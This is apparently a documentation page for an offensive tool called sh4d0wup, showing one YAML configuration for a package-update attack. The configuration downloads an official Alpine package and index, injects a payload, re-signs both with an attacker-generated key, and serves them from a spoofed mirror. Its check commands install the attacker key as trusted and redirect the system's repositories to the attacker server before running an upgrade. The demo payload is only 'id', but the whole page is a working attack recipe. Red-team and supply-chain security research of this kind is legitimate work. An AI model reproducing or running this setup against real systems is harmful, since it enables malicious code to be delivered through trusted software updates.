sh4d0wup 0.11.0

Signing-key abuse and update exploitation framework
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73

---

upstreams:
  alpine:
    url: https://dl-cdn.alpinelinux.org/

signing_keys:
  pwn:
    type: openssl
    keypair_type: rsa
    bits: 4096

artifacts:
  upstream_index:
    type: url
    url: https://dl-cdn.alpinelinux.org/alpine/edge/main/x86_64/APKINDEX.tar.gz

  upstream_release:
    type: apk-pkg
    artifact: upstream_index
    url: https://dl-cdn.alpinelinux.org/alpine/edge/main/x86_64/
    pkg:
      name: alpine-baselayout-data

  upstream_pkg:
    type: url
    url_template: '{{url}}'
    template_metadata: upstream_release

  pkg_infected:
    type: infect
    infect: apk
    artifact: upstream_pkg
    signing_key: pwn
    signing_key_name: hax.rsa.pub
    payload: id

  index_patched:
    type: tamper
    tamper: patch-apk-index
    artifact: upstream_index
    signing_key: pwn
    signing_key_name: hax.rsa.pub
    #patch:
    #  - name: alpine-baselayout
    #    artifact: pkg_infected
    #    set:
    #      "V": 3.1337.0-r0

check:
  image: alpine:edge
  install_keys:
    - key: pwn
      cmd: "tee /etc/apk/keys/hax.rsa.pub > /dev/null"
  cmds:
    - 'echo "http://${SH4D0WUP_BOUND_ADDR}/alpine/edge/main" | tee /etc/apk/repositories'
    - 'echo "http://${SH4D0WUP_BOUND_ADDR}/alpine/edge/community" | tee -a /etc/apk/repositories'
    - ["apk", "upgrade"]

routes:
  - path: /alpine/edge/main/x86_64/APKINDEX.tar.gz
    type: static
    args:
      artifact: index_patched

  - path: /alpine/edge/main/x86_64/alpine-baselayout-data-3.1337.0-r0.apk
    type: static
    args:
      artifact: pkg_infected

  - type: proxy
    args:
      upstream: alpine